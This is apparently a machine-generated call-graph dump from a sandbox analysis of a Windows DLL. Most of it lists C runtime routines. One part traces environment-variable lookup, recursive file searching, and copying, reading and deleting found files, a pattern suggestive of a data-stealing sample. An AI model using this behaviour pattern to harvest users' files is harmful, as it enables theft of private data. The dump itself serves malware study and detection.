22f59221 __fassign 20 API calls 6590->6591 6592 22f592a5 6591->6592 6593 22f5571e _free 20 API calls 6592->6593 6594 22f592b0 6593->6594 6595 22f5571e _free 20 API calls 6594->6595 6596 22f592bb 6595->6596 6597 22f5571e _free 20 API calls 6596->6597 6598 22f592c6 6597->6598 6599 22f59221 __fassign 20 API calls 6598->6599 6600 22f592d4 6599->6600 6601 22f59221 __fassign 20 API calls 6600->6601 6602 22f592e2 6601->6602 6603 22f59221 __fassign 20 API calls 6602->6603 6604 22f592f3 6603->6604 6605 22f59221 __fassign 20 API calls 6604->6605 6606 22f59301 6605->6606 6607 22f59221 __fassign 20 API calls 6606->6607 6608 22f5930f 6607->6608 6609 22f5571e _free 20 API calls 6608->6609 6610 22f5931a 6609->6610 6611 22f5571e _free 20 API calls 6610->6611 6612 22f59325 6611->6612 6613 22f5571e _free 20 API calls 6612->6613 6614 22f59330 6613->6614 6615 22f5571e _free 20 API calls 6614->6615 6615->6581 6616->6505 6618 22f56baf 6617->6618 6623 22f56b05 6617->6623 6620 22f52ada _ValidateLocalCookies 5 API calls 6618->6620 6622 22f56c5b 6620->6622 6622->6310 6627 22f586e4 6623->6627 6626 22f58a3e 43 API calls 6626->6618 6628 22f554a7 __fassign 38 API calls 6627->6628 6629 22f58704 MultiByteToWideChar 6628->6629 6631 22f58742 6629->6631 6632 22f587da 6629->6632 6634 22f556d0 21 API calls 6631->6634 6638 22f58763 ___scrt_fastfail 6631->6638 6633 22f52ada _ValidateLocalCookies 5 API calls 6632->6633 6635 22f56b66 6633->6635 6634->6638 6641 22f58a3e 6635->6641 6636 22f587d4 6646 22f58801 6636->6646 6638->6636 6639 22f587a8 MultiByteToWideChar 6638->6639 6639->6636 6640 22f587c4 GetStringTypeW 6639->6640 6640->6636 6642 22f554a7 __fassign 38 API calls 6641->6642 6643 22f58a51 6642->6643 6650 22f58821 6643->6650 6647 22f5880d 6646->6647 6648 22f5881e 6646->6648 6647->6648 6649 22f5571e _free 20 API calls 6647->6649 6648->6632 6649->6648 6651 22f5883c 6650->6651 6652 22f58862 MultiByteToWideChar 6651->6652 6653 22f5888c 6652->6653 6654 22f58a16 6652->6654 6659 22f556d0 21 API calls 6653->6659 6661 22f588ad 6653->6661 6655 22f52ada _ValidateLocalCookies 5 API calls 6654->6655 6656 22f56b87 6655->6656 6656->6626 6657 22f588f6 MultiByteToWideChar 6658 22f58962 6657->6658 6660 22f5890f 6657->6660 6663 22f58801 __freea 20 API calls 6658->6663 6659->6661 6677 22f55f19 6660->6677 6661->6657 6661->6658 6663->6654 6665 22f58971 6667 22f556d0 21 API calls 6665->6667 6671 22f58992 6665->6671 6666 22f58939 6666->6658 6668 22f55f19 11 API calls 6666->6668 6667->6671 6668->6658 6669 22f58a07 6670 22f58801 __freea 20 API calls 6669->6670 6670->6658 6671->6669 6672 22f55f19 11 API calls 6671->6672 6673 22f589e6 6672->6673 6673->6669 6674 22f589f5 WideCharToMultiByte 6673->6674 6674->6669 6675 22f58a35 6674->6675 6676 22f58801 __freea 20 API calls 6675->6676 6676->6658 6678 22f55c45 _abort 5 API calls 6677->6678 6679 22f55f40 6678->6679 6682 22f55f49 6679->6682 6685 22f55fa1 6679->6685 6683 22f52ada _ValidateLocalCookies 5 API calls 6682->6683 6684 22f55f9b 6683->6684 6684->6658 6684->6665 6684->6666 6686 22f55c45 _abort 5 API calls 6685->6686 6687 22f55fc8 6686->6687 6688 22f52ada _ValidateLocalCookies 5 API calls 6687->6688 6689 22f55f89 LCMapStringW 6688->6689 6689->6682 6691 22f56892 ___DestructExceptionObject 6690->6691 6698 22f55671 RtlEnterCriticalSection 6691->6698 6693 22f5689c 6699 22f568f1 6693->6699 6697 22f568b5 _abort 6697->6315 6698->6693 6711 22f57011 6699->6711 6701 22f5693f 6702 22f57011 26 API calls 6701->6702 6703 22f5695b 6702->6703 6704 22f57011 26 API calls 6703->6704 6705 22f56979 6704->6705 6706 22f568a9 6705->6706 6707 22f5571e _free 20 API calls 6705->6707 6708 22f568bd 6706->6708 6707->6706 6725 22f556b9 RtlLeaveCriticalSection 6708->6725 6710 22f568c7 6710->6697 6712 22f57022 6711->6712 6720 22f5701e 6711->6720 6713 22f57029 6712->6713 6715 22f5703c ___scrt_fastfail 6712->6715 6714 22f56368 __dosmaperr 20 API calls 6713->6714 6716 22f5702e 6714->6716 6718 22f57073 6715->6718 6719 22f5706a 6715->6719 6715->6720 6717 22f562ac ___std_exception_copy 26 API calls 6716->6717 6717->6720 6718->6720 6722 22f56368 __dosmaperr 20 API calls 6718->6722 6721 22f56368 __dosmaperr 20 API calls 6719->6721 6720->6701 6723 22f5706f 6721->6723 6722->6723 6724 22f562ac ___std_exception_copy 26 API calls 6723->6724 6724->6720 6725->6710 6727 22f55468 6726->6727 6728 22f5545a 6726->6728 6729 22f56368 __dosmaperr 20 API calls 6727->6729 6728->6727 6732 22f5547f 6728->6732 6734 22f55470 6729->6734 6730 22f562ac ___std_exception_copy 26 API calls 6731 22f5547a 6730->6731 6731->6236 6732->6731 6733 22f56368 __dosmaperr 20 API calls 6732->6733 6733->6734 6734->6730 6739 22f5500d 6735->6739 6740 22f54fd7 6735->6740 6736 22f55024 6738 22f5571e _free 20 API calls 6736->6738 6737 22f5571e _free 20 API calls 6737->6739 6738->6740 6739->6736 6739->6737 6740->6234 7187 22f55351 7188 22f55360 7187->7188 7192 22f55374 7187->7192 7190 22f5571e _free 20 API calls 7188->7190 7188->7192 7189 22f5571e _free 20 API calls 7191 22f55386 7189->7191 7190->7192 7193 22f5571e _free 20 API calls 7191->7193 7192->7189 7194 22f55399 7193->7194 7195 22f5571e _free 20 API calls 7194->7195 7196 22f553aa 7195->7196 7197 22f5571e _free 20 API calls 7196->7197 7198 22f553bb 7197->7198 6741 22f536d0 6742 22f536f0 @_EH4_CallFilterFunc@8 6741->6742 6743 22f536e2 6741->6743 6744 22f52ada _ValidateLocalCookies 5 API calls 6743->6744 6744->6742 7062 22f53c90 RtlUnwind 6745 22f54bdd 6746 22f54bec 6745->6746 6747 22f54c08 6745->6747 6746->6747 6748 22f54bf2 6746->6748 6749 22f56d60 51 API calls 6747->6749 6751 22f56368 __dosmaperr 20 API calls 6748->6751 6750 22f54c0f GetModuleFileNameA 6749->6750 6752 22f54c33 6750->6752 6753 22f54bf7 6751->6753 6768 22f54d01 6752->6768 6754 22f562ac ___std_exception_copy 26 API calls 6753->6754 6756 22f54c01 6754->6756 6758 22f54e76 20 API calls 6759 22f54c5d 6758->6759 6760 22f54c66 6759->6760 6761 22f54c72 6759->6761 6762 22f56368 __dosmaperr 20 API calls 6760->6762 6763 22f54d01 38 API calls 6761->6763 6767 22f54c6b 6762->6767 6764 22f54c88 6763->6764 6766 22f5571e _free 20 API calls 6764->6766 6764->6767 6765 22f5571e _free 20 API calls 6765->6756 6766->6767 6767->6765 6770 22f54d26 6768->6770 6772 22f54d86 6770->6772 6774 22f570eb 6770->6774 6771 22f54c50 6771->6758 6772->6771 6773 22f570eb 38 API calls 6772->6773 6773->6772 6777 22f57092 6774->6777 6778 22f554a7 __fassign 38 API calls 6777->6778 6779 22f570a6 6778->6779 6779->6770 7772 22f5281c 7773 22f52882 std::exception::exception 27 API calls 7772->7773 7774 22f5282a 7773->7774 7775 22f52418 7776 22f52420 ___scrt_release_startup_lock 7775->7776 7779 22f547f5 7776->7779 7778 22f52448 7780 22f54804 7779->7780 7781 22f54808 7779->7781 7780->7778 7784 22f54815 7781->7784 7785 22f55b7a __dosmaperr 20 API calls 7784->7785 7788 22f5482c 7785->7788 7786 22f52ada _ValidateLocalCookies 5 API calls 7787 22f54811 7786->7787 7787->7778 7788->7786 5791 22f51c5b 5792 22f51c6b ___scrt_fastfail 5791->5792 5795 22f512ee 5792->5795 5794 22f51c87 5796 22f51324 ___scrt_fastfail 5795->5796 5797 22f513b7 GetEnvironmentVariableW 5796->5797 5821 22f510f1 5797->5821 5800 22f510f1 57 API calls 5801 22f51465 5800->5801 5802 22f510f1 57 API calls 5801->5802 5803 22f51479 5802->5803 5804 22f510f1 57 API calls 5803->5804 5805 22f5148d 5804->5805 5806 22f510f1 57 API calls 5805->5806 5807 22f514a1 5806->5807 5808 22f510f1 57 API calls 5807->5808 5809 22f514b5 lstrlenW 5808->5809 5810 22f514d9 lstrlenW 5809->5810 5820 22f514d2 5809->5820 5811 22f510f1 57 API calls 5810->5811 5812 22f51501 lstrlenW lstrcatW 5811->5812 5813 22f510f1 57 API calls 5812->5813 5814 22f51539 lstrlenW lstrcatW 5813->5814 5815 22f510f1 57 API calls 5814->5815 5816 22f5156b lstrlenW lstrcatW 5815->5816 5817 22f510f1 57 API calls 5816->5817 5818 22f5159d lstrlenW lstrcatW 5817->5818 5819 22f510f1 57 API calls 5818->5819 5819->5820 5820->5794 5822 22f51118 ___scrt_fastfail 5821->5822 5823 22f51129 lstrlenW 5822->5823 5834 22f52c40 5823->5834 5826 22f51177 lstrlenW FindFirstFileW 5828 22f511e1 5826->5828 5829 22f511a0 5826->5829 5827 22f51168 lstrlenW 5827->5826 5828->5800 5830 22f511c7 FindNextFileW 5829->5830 5833 22f511aa 5829->5833 5830->5829 5832 22f511da FindClose 5830->5832 5832->5828 5833->5830 5836 22f51000 5833->5836 5835 22f51148 lstrcatW lstrlenW 5834->5835 5835->5826 5835->5827 5837 22f51022 ___scrt_fastfail 5836->5837 5838 22f510af 5837->5838 5839 22f5102f lstrcatW lstrlenW 5837->5839 5840 22f510b5 lstrlenW 5838->5840 5851 22f510ad 5838->5851 5841 22f5106b lstrlenW 5839->5841 5842 22f5105a lstrlenW 5839->5842 5867 22f51e16 5840->5867 5853 22f51e89 lstrlenW 5841->5853 5842->5841 5845 22f51088 GetFileAttributesW 5847 22f5109c 5845->5847 5845->5851 5846 22f510ca 5848 22f51e89 5 API calls 5846->5848 5846->5851 5847->5851 5859 22f5173a 5847->5859 5850 22f510df 5848->5850 5872 22f511ea 5850->5872 5851->5833 5854 22f52c40 ___scrt_fastfail 5853->5854 5855 22f51ea7 lstrcatW lstrlenW 5854->5855 5856 22f51ed1 lstrcatW 5855->5856 5857 22f51ec2 5855->5857 5856->5845 5857->5856 5858 22f51ec7 lstrlenW 5857->5858 5858->5856 5860 22f51747 ___scrt_fastfail 5859->5860 5887 22f51cca 5860->5887 5864 22f5199f 5864->5851 5865 22f51824 ___scrt_fastfail _strlen 5865->5864 5907 22f515da 5865->5907 5868 22f51e29 5867->5868 5871 22f51e4c 5867->5871 5869 22f51e2d lstrlenW 5868->5869 5868->5871 5870 22f51e3f lstrlenW 5869->5870 5869->5871 5870->5871 5871->5846 5873 22f5120e ___scrt_fastfail 5872->5873 5874 22f51e89 5 API calls 5873->5874 5875 22f51220 GetFileAttributesW 5874->5875 5876 22f51235 5875->5876 5877 22f51246 5875->5877 5876->5877 5880 22f5173a 35 API calls 5876->5880 5878 22f51e89 5 API calls 5877->5878 5879 22f51258 5878->5879 5881 22f510f1 56 API calls 5879->5881 5880->5877 5882 22f5126d 5881->5882 5883 22f51e89 5 API calls 5882->5883 5884 22f5127f ___scrt_fastfail 5883->5884 5885 22f510f1 56 API calls 5884->5885 5886 22f512e6 5885->5886 5886->5851 5888 22f51cf1 ___scrt_fastfail 5887->5888 5889 22f51d0f CopyFileW CreateFileW 5888->5889 5890 22f51d55 GetFileSize 5889->5890 5891 22f51d44 DeleteFileW 5889->5891 5892 22f51ede 22 API calls 5890->5892 5896 22f51808 5891->5896 5893 22f51d66 ReadFile 5892->5893 5894 22f51d94 CloseHandle DeleteFileW 5893->5894 5895 22f51d7d CloseHandle DeleteFileW 5893->5895 5894->5896 5895->5896 5896->5864 5897 22f51ede 5896->5897 5899 22f5222f 5897->5899 5900 22f5224e 5899->5900 5903 22f52250 5899->5903 5915 22f5474f 5899->5915 5920 22f547e5 5899->5920 5900->5865 5902 22f52908 5904 22f535d2 __CxxThrowException@8 RaiseException 5902->5904 5903->5902 5927 22f535d2 5903->5927 5905 22f52925 5904->5905 5905->5865 5908 22f5160c _strcat _strlen 5907->5908 5909 22f5163c lstrlenW 5908->5909 6015 22f51c9d 5909->6015 5911 22f51655 lstrcatW lstrlenW 5912 22f51678 5911->5912 5913 22f51693 ___scrt_fastfail 5912->5913 5914 22f5167e lstrcatW 5912->5914 5913->5865 5914->5913 5930 22f54793 5915->5930 5918 22f5478f 5918->5899 5919 22f54765 5936 22f52ada 5919->5936 5926 22f556d0 _abort 5920->5926 5921 22f5570e 5949 22f56368 5921->5949 5923 22f556f9 RtlAllocateHeap 5924 22f5570c 5923->5924 5923->5926 5924->5899 5925 22f5474f _abort 7 API calls 5925->5926 5926->5921 5926->5923 5926->5925 5928 22f535f2 RaiseException 5927->5928 5928->5902 5931 22f5479f ___DestructExceptionObject 5930->5931 5943 22f55671 RtlEnterCriticalSection 5931->5943 5933 22f547aa 5944 22f547dc 5933->5944 5935 22f547d1 _abort 5935->5919 5937 22f52ae5 IsProcessorFeaturePresent 5936->5937 5938 22f52ae3 5936->5938 5940 22f52b58 5937->5940 5938->5918 5948 22f52b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5940->5948 5942 22f52c3b 5942->5918 5943->5933 5947 22f556b9 RtlLeaveCriticalSection 5944->5947 5946 22f547e3 5946->5935 5947->5946 5948->5942 5952 22f55b7a GetLastError 5949->5952 5953 22f55b93 5952->5953 5954 22f55b99 5952->5954 5971 22f55e08 5953->5971 5958 22f55bf0 SetLastError 5954->5958 5978 22f5637b 5954->5978 5959 22f55bf9 5958->5959 5959->5924 5963 22f55bb9 5966 22f55be7 SetLastError 5963->5966 5964 22f55bb3 5985 22f5571e 5964->5985 5965 22f55bcf 5998 22f5593c 5965->5998 5966->5959 5969 22f5571e _free 17 API calls 5970 22f55be0 5969->5970 5970->5958 5970->5966 6003 22f55c45 5971->6003 5973 22f55e2f 5974 22f55e47 TlsGetValue 5973->5974 5975 22f55e3b 5973->5975 5974->5975 5976 22f52ada _ValidateLocalCookies 5 API calls 5975->5976 5977 22f55e58 5976->5977 5977->5954 5983 22f56388 _abort 5978->5983 5979 22f563c8 5982 22f56368 __dosmaperr 19 API calls 5979->5982 5980 22f563b3 RtlAllocateHeap 5981 22f55bab 5980->5981 5980->5983 5981->5964 5991 22f55e5e 5981->5991 5982->5981 5983->5979 5983->5980 5984 22f5474f _abort 7 API calls 5983->5984 5984->5983 5986 22f55729 HeapFree 5985->5986 5990 22f55752 __dosmaperr 5985->5990 5987 22f5573e 5986->5987 5986->5990 5988 22f56368 __dosmaperr 18 API calls 5987->5988 5989 22f55744 GetLastError 5988->5989 5989->5990 5990->5963 5992 22f55c45 _abort 5 API calls 5991->5992 5993 22f55e85 5992->5993 5994 22f55ea0 TlsSetValue 5993->5994 5995 22f55e94 5993->5995 5994->5995 5996 22f52ada _ValidateLocalCookies 5 API calls 5995->5996 5997 22f55bc8 5996->5997 5997->5964 5997->5965 6009 22f55914 5998->6009 6004 22f55c71 6003->6004 6005 22f55c75 __crt_fast_encode_pointer 6003->6005 6004->6005 6006 22f55ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6004->6006 6008 22f55c95 6004->6008 6005->5973 6006->6004 6007 22f55ca1 GetProcAddress 6007->6005 6008->6005 6008->6007 6010 22f55854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6009->6010 6011 22f55938 6010->6011 6012 22f558c4 6011->6012 6013 22f55758 _abort 20 API calls 6012->6013 6014 22f558e8 6013->6014 6014->5969 6016 22f51ca6 _strlen 6015->6016 6016->5911 6780 22f520db 6781 22f520e7 ___DestructExceptionObject 6780->6781 6782 22f52110 dllmain_raw 6781->6782 6786 22f5210b 6781->6786 6792 22f520f6 6781->6792 6783 22f5212a 6782->6783 6782->6792 6793 22f51eec 6783->6793 6785 22f52177 6787 22f51eec 31 API calls 6785->6787 6785->6792 6786->6785 6789 22f51eec 31 API calls 6786->6789 6786->6792 6788 22f5218a 6787->6788 6790 22f52193 dllmain_raw 6788->6790 6788->6792 6791 22f5216d dllmain_raw 6789->6791 6790->6792 6791->6785 6794 22f51ef7 6793->6794 6795 22f51f2a dllmain_crt_process_detach 6793->6795 6796 22f51f1c dllmain_crt_process_attach 6794->6796 6797 22f51efc 6794->6797 6802 22f51f06 6795->6802 6796->6802 6798 22f51f01 6797->6798 6799 22f51f12 6797->6799 6798->6802 6803 22f5240b 6798->6803 6808 22f523ec 6799->6808 6802->6786 6816 22f553e5 6803->6816 6927 22f53513 6808->6927 6811 22f523f5 6811->6802 6814 22f52408 6814->6802 6815 22f5351e 7 API calls 6815->6811 6822 22f55aca 6816->6822 6819 22f5351e 6898 22f53820 6819->6898 6821 22f52415 6821->6802 6823 22f52410 6822->6823 6824 22f55ad4 6822->6824 6823->6819 6825 22f55e08 _abort 11 API calls 6824->6825 6826 22f55adb 6825->6826 6826->6823 6827 22f55e5e _abort 11 API calls 6826->6827 6828 22f55aee 6827->6828 6830 22f559b5 6828->6830 6831 22f559c0 6830->6831 6832 22f559d0 6830->6832 6836 22f559d6 6831->6836 6832->6823 6835 22f5571e _free 20 API calls 6835->6832 6837 22f559ef 6836->6837 6838 22f559e9 6836->6838 6840 22f5571e _free 20 API calls 6837->6840 6839 22f5571e _free 20 API calls 6838->6839 6839->6837 6841 22f559fb 6840->6841 6842 22f5571e _free 20 API calls 6841->6842 6843 22f55a06 6842->6843 6844 22f5571e _free 20 API calls 6843->6844 6845 22f55a11 6844->6845 6846 22f5571e _free 20 API calls 6845->6846 6847 22f55a1c 6846->6847 6848 22f5571e _free 20 API calls 6847->6848 6849 22f55a27 6848->6849 6850 22f5571e _free 20 API calls 6849->6850 6851 22f55a32 6850->6851 6852 22f5571e _free 20 API calls 6851->6852 6853 22f55a3d 6852->6853 6854 22f5571e _free 20 API calls 6853->6854 6855 22f55a48 6854->6855 6856 22f5571e _free 20 API calls 6855->6856 6857 22f55a56 6856->6857 6862 22f5589c 6857->6862 6868 22f557a8 6862->6868 6864 22f558c0 6865 22f558ec 6864->6865 6881 22f55809 6865->6881 6867 22f55910 6867->6835 6869 22f557b4 ___DestructExceptionObject 6868->6869 6876 22f55671 RtlEnterCriticalSection 6869->6876 6871 22f557e8 6877 22f557fd 6871->6877 6873 22f557f5 _abort 6873->6864 6874 22f557be 6874->6871 6875 22f5571e _free 20 API calls 6874->6875 6875->6871 6876->6874 6880 22f556b9 RtlLeaveCriticalSection 6877->6880 6879 22f55807 6879->6873 6880->6879 6882 22f55815 ___DestructExceptionObject 6881->6882 6889 22f55671 RtlEnterCriticalSection 6882->6889 6884 22f5581f 6890 22f55a7f 6884->6890 6886 22f55832 6894 22f55848 6886->6894 6888 22f55840 _abort 6888->6867 6889->6884 6891 22f55ab5 __fassign 6890->6891 6892 22f55a8e __fassign 6890->6892 6891->6886 6892->6891 6893 22f57cc2 __fassign 20 API calls 6892->6893 6893->6891 6897 22f556b9 RtlLeaveCriticalSection 6894->6897 6896 22f55852 6896->6888 6897->6896 6899 22f5382d 6898->6899 6903 22f5384b ___vcrt_freefls@4 6898->6903 6900 22f5383b 6899->6900 6904 22f53b67 6899->6904 6909 22f53ba2 6900->6909 6903->6821 6914 22f53a82 6904->6914 6906 22f53b81 6907 22f53b99 TlsGetValue 6906->6907 6908 22f53b8d 6906->6908 6907->6908 6908->6900 6910 22f53a82 try_get_function 5 API calls 6909->6910 6911 22f53bbc 6910->6911 6912 22f53bd7 TlsSetValue 6911->6912 6913 22f53bcb 6911->6913 6912->6913 6913->6903 6915 22f53aaa 6914->6915 6919 22f53aa6 __crt_fast_encode_pointer 6914->6919 6915->6919 6920 22f539be 6915->6920 6918 22f53ac4 GetProcAddress 6918->6919 6919->6906 6925 22f539cd try_get_first_available_module 6920->6925 6921 22f539ea LoadLibraryExW 6922 22f53a05 GetLastError 6921->6922 6921->6925 6922->6925 6923 22f53a60 FreeLibrary 6923->6925 6924 22f53a77 6924->6918 6924->6919 6925->6921 6925->6923 6925->6924 6926 22f53a38 LoadLibraryExW 6925->6926 6926->6925 6933 22f53856 6927->6933 6929 22f523f1 6929->6811 6930 22f553da 6929->6930 6931 22f55b7a __dosmaperr 20 API calls 6930->6931 6932 22f523fd 6931->6932 6932->6814 6932->6815 6934 22f53862 GetLastError 6933->6934 6935 22f5385f 6933->6935 6936 22f53b67 ___vcrt_FlsGetValue 6 API calls 6934->6936 6935->6929 6937 22f53877 6936->6937 6938 22f538dc SetLastError 6937->6938 6939 22f53ba2 ___vcrt_FlsSetValue 6 API calls 6937->6939 6944 22f53896 6937->6944 6938->6929 6940 22f53890 6939->6940 6941 22f538b8 6940->6941 6942 22f53ba2 ___vcrt_FlsSetValue 6 API calls 6940->6942 6940->6944 6943 22f53ba2 ___vcrt_FlsSetValue 6 API calls 6941->6943 6941->6944 6942->6941 6943->6944 6944->6938 7063 22f54a9a 7064 22f55411 38 API calls 7063->7064 7065 22f54aa2 7064->7065 7199 22f5a945 7201 22f5a96d 7199->7201 7200 22f5a9a5 7201->7200 7202 22f5a997 7201->7202 7203 22f5a99e 7201->7203 7204 22f5aa17 21 API calls 7202->7204 7208 22f5aa00 7203->7208 7206 22f5a99c 7204->7206 7209 22f5aa20 7208->7209 7210 22f5b19b __startOneArgErrorHandling 21 API calls 7209->7210 7211 22f5a9a3 7210->7211 6945 22f57bc7 6946 22f57bd3 ___DestructExceptionObject 6945->6946 6947 22f57c0a _abort 6946->6947 6953 22f55671 RtlEnterCriticalSection 6946->6953 6949 22f57be7 6950 22f57f86 __fassign 20 API calls 6949->6950 6951 22f57bf7 6950->6951 6954 22f57c10 6951->6954 6953->6949 6957 22f556b9 RtlLeaveCriticalSection 6954->6957 6956 22f57c17 6956->6947 6957->6956 6958 22f5a1c6 IsProcessorFeaturePresent 7066 22f57a80 7067 22f57a8d 7066->7067 7068 22f5637b _abort 20 API calls 7067->7068 7069 22f57aa7 7068->7069 7070 22f5571e _free 20 API calls 7069->7070 7071 22f57ab3 7070->7071 7072 22f5637b _abort 20 API calls 7071->7072 7076 22f57ad9 7071->7076 7073 22f57acd 7072->7073 7075 22f5571e _free 20 API calls 7073->7075 7074 22f55eb7 11 API calls 7074->7076 7075->7076 7076->7074 7077 22f57ae5 7076->7077 7212 22f58640 7215 22f58657 7212->7215 7216 22f58665 7215->7216 7217 22f58679 7215->7217 7218 22f56368 __dosmaperr 20 API calls 7216->7218 7219 22f58681 7217->7219 7220 22f58693 7217->7220 7221 22f5866a 7218->7221 7222 22f56368 __dosmaperr 20 API calls 7219->7222 7225 22f554a7 __fassign 38 API calls 7220->7225 7226 22f58652 7220->7226 7223 22f562ac ___std_exception_copy 26 API calls 7221->7223 7224 22f58686 7222->7224 7223->7226 7227 22f562ac ___std_exception_copy 26 API calls 7224->7227 7225->7226 7227->7226 7228 22f5af43 7229 22f5af4d 7228->7229 7230 22f5af59 7228->7230 7229->7230 7231 22f5af52 CloseHandle 7229->7231 7231->7230 7789 22f55303 7792 22f550a5 7789->7792 7801 22f5502f 7792->7801 7795 22f5502f 5 API calls 7796 22f550c3 7795->7796 7797 22f55000 20 API calls 7796->7797 7798 22f550ce 7797->7798 7799 22f55000 20 API calls 7798->7799 7800 22f550d9 7799->7800 7802 22f55048 7801->7802 7803 22f52ada _ValidateLocalCookies 5 API calls 7802->7803 7804 22f55069 7803->7804 7804->7795 7805 22f57103 GetCommandLineA GetCommandLineW 7806 22f5220c 7807 22f52215 7806->7807 7808 22f5221a dllmain_dispatch 7806->7808 7810 22f522b1 7807->7810 7811 22f522c7 7810->7811 7813 22f522d0 7811->7813 7814 22f52264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7811->7814 7813->7808 7814->7813 7232 22f5284f 7235 22f52882 7232->7235 7238 22f53550 7235->7238 7237 22f5285d 7239 22f5355d 7238->7239 7242 22f5358a 7238->7242 7240 22f547e5 ___std_exception_copy 21 API calls 7239->7240 7239->7242 7241 22f5357a 7240->7241 7241->7242 7243 22f5544d ___std_exception_copy 26 API calls 7241->7243 7242->7237 7243->7242 7244 22f5724e GetProcessHeap 7078 22f58a89 7079 22f56d60 51 API calls 7078->7079 7080 22f58a8e 7079->7080 7245 22f52049 7246 22f52055 ___DestructExceptionObject 7245->7246 7247 22f520d3 7246->7247 7248 22f5207d 7246->7248 7258 22f5205e 7246->7258 7280 22f52639 IsProcessorFeaturePresent 7247->7280 7259 22f5244c 7248->7259 7251 22f52082 7268 22f52308 7251->7268 7252 22f520da 7254 22f52087 __RTC_Initialize 7271 22f520c4 7254->7271 7256 22f5209f 7274 22f5260b 7256->7274 7260 22f52451 ___scrt_release_startup_lock 7259->7260 7261 22f52455 7260->7261 7264 22f52461 7260->7264 7262 22f5527a _abort 20 API calls 7261->7262 7263 22f5245f 7262->7263 7263->7251 7265 22f5246e 7264->7265 7266 22f5499b _abort 28 API calls 7264->7266 7265->7251 7267 22f54bbd 7266->7267 7267->7251 7284 22f534c7 RtlInterlockedFlushSList 7268->7284 7270 22f52312 7270->7254 7286 22f5246f 7271->7286 7273 22f520c9 ___scrt_release_startup_lock 7273->7256 7275 22f52617 7274->7275 7276 22f5262d 7275->7276 7303 22f553ed 7275->7303 7276->7258 7281 22f5264e ___scrt_fastfail 7280->7281 7282 22f526f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7281->7282 7283 22f52744 ___scrt_fastfail 7282->7283 7283->7252 7285 22f534d7 7284->7285 7285->7270 7291 22f553ff 7286->7291 7292 22f55c2b 11 API calls 7291->7292 7293 22f52476 7292->7293 7294 22f5391b 7293->7294 7295 22f53925 7294->7295 7296 22f5354d 7294->7296 7298 22f53b2c 7295->7298 7296->7273 7299 22f53a82 try_get_function 5 API calls 7298->7299 7300 22f53b46 7299->7300 7301 22f53b5e TlsFree 7300->7301 7302 22f53b52 7300->7302 7301->7302 7302->7296 7314 22f574da 7303->7314 7306 22f53529 7307 22f53543 7306->7307 7308 22f53532 7306->7308 7307->7276 7309 22f5391b ___vcrt_uninitialize_ptd 6 API calls 7308->7309 7310 22f53537 7309->7310 7318 22f53972 7310->7318 7315 22f574f3 7314->7315 7316 22f52ada _ValidateLocalCookies 5 API calls 7315->7316 7317 22f52625 7316->7317 7317->7306 7319 22f5353c 7318->7319 7320 22f5397d 7318->7320 7322 22f53c50 7319->7322 7321 22f53987 RtlDeleteCriticalSection 7320->7321 7321->7319 7321->7321 7323 22f53c59 7322->7323 7324 22f53c7f 7322->7324 7323->7324 7325 22f53c69 FreeLibrary 7323->7325 7324->7307 7325->7323 7326 22f55348 7327 22f53529 ___vcrt_uninitialize 8 API calls 7326->7327 7328 22f5534f 7327->7328 7329 22f57b48 7339 22f58ebf 7329->7339 7333 22f57b55 7352 22f5907c 7333->7352 7336 22f57b7f 7337 22f5571e _free 20 API calls 7336->7337 7338 22f57b8a 7337->7338 7356 22f58ec8 7339->7356 7341 22f57b50 7342 22f58fdc 7341->7342 7343 22f58fe8 ___DestructExceptionObject 7342->7343 7376 22f55671 RtlEnterCriticalSection 7343->7376 7345 22f5905e 7390 22f59073 7345->7390 7347 22f5906a _abort 7347->7333 7348 22f59032 RtlDeleteCriticalSection 7350 22f5571e _free 20 API calls 7348->7350 7351 22f58ff3 7350->7351 7351->7345 7351->7348 7377 22f5a09c 7351->7377 7353 22f57b64 RtlDeleteCriticalSection 7352->7353 7354 22f59092 7352->7354 7353->7333 7353->7336 7354->7353 7355 22f5571e _free 20 API calls 7354->7355 7355->7353 7357 22f58ed4 ___DestructExceptionObject 7356->7357 7366 22f55671 RtlEnterCriticalSection 7357->7366 7359 22f58f77 7371 22f58f97 7359->7371 7363 22f58f83 _abort 7363->7341 7364 22f58ee3 7364->7359 7365 22f58e78 66 API calls 7364->7365 7367 22f57b94 RtlEnterCriticalSection 7364->7367 7368 22f58f6d 7364->7368 7365->7364 7366->7364 7367->7364 7374 22f57ba8 RtlLeaveCriticalSection 7368->7374 7370 22f58f75 7370->7364 7375 22f556b9 RtlLeaveCriticalSection 7371->7375 7373 22f58f9e 7373->7363 7374->7370 7375->7373 7376->7351 7378 22f5a0a8 ___DestructExceptionObject 7377->7378 7379 22f5a0ce 7378->7379 7380 22f5a0b9 7378->7380 7389 22f5a0c9 _abort 7379->7389 7393 22f57b94 RtlEnterCriticalSection 7379->7393 7381 22f56368 __dosmaperr 20 API calls 7380->7381 7382 22f5a0be 7381->7382 7384 22f562ac ___std_exception_copy 26 API calls 7382->7384 7384->7389 7385 22f5a0ea 7394 22f5a026 7385->7394 7387 22f5a0f5 7410 22f5a112 7387->7410 7389->7351 7658 22f556b9 RtlLeaveCriticalSection 7390->7658 7392 22f5907a 7392->7347 7393->7385 7395 22f5a033 7394->7395 7396 22f5a048 7394->7396 7397 22f56368 __dosmaperr 20 API calls 7395->7397 7408 22f5a043 7396->7408 7413 22f58e12 7396->7413 7398 22f5a038 7397->7398 7400 22f562ac ___std_exception_copy 26 API calls 7398->7400 7400->7408 7402 22f5907c 20 API calls 7403 22f5a064 7402->7403 7419 22f57a5a 7403->7419 7405 22f5a06a 7426 22f5adce 7405->7426 7408->7387 7409 22f5571e _free 20 API calls 7409->7408 7657 22f57ba8 RtlLeaveCriticalSection 7410->7657 7412 22f5a11a 7412->7389 7414 22f58e2a 7413->7414 7416 22f58e26 7413->7416 7415 22f57a5a 26 API calls 7414->7415 7414->7416 7417 22f58e4a 7415->7417 7416->7402 7441 22f59a22 7417->7441 7420 22f57a66 7419->7420 7421 22f57a7b 7419->7421 7422 22f56368 __dosmaperr 20 API calls 7420->7422 7421->7405 7423 22f57a6b 7422->7423 7424 22f562ac ___std_exception_copy 26 API calls 7423->7424 7425 22f57a76 7424->7425 7425->7405 7427 22f5addd 7426->7427 7429 